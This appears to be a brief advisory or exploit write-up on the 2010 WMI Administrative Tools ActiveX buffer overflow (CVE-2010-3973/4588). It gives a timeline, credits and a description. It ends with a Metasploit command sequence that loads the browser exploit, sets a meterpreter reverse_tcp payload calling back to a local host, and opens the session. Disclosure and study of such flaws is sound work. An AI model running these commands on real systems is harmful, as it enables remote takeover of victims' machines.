Microsoft WMI Administration Tools ActiveX Buffer Overflow

Timeline :

Vulnerability & PoC disclosed by WooYun the 2010-12-22
Metasploit PoC provided the 2010-12-22

    PoC provided by :

WooYun
MC
jduck

    Reference(s) :

CVE-2010-3973
CVE-2010-4588

    Affected version(s) :

Microsoft WMI Administrative Tools 1.1

    Tested on Windows XP SP3

    Description :

The 22 December WooYun, a security researcher, has disclose a vulnerability, accompanied by a PoC, for WMI Administrative Tools 1.1. These tools are not included by default in Microsoft Windows, and need to be additionally installed on Windows XP. The same day, Metasploit team has release a module to industrialize the exploitation of this vulnerability. This vulnerability is identified by CVE-2010-3973 and CVE-2010-4588. Actually they are no Microsoft planned patch.

    Commands :

use exploit/windows/browser/wmi_admintools
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
sessions -i 1

sysinfo
ipconfig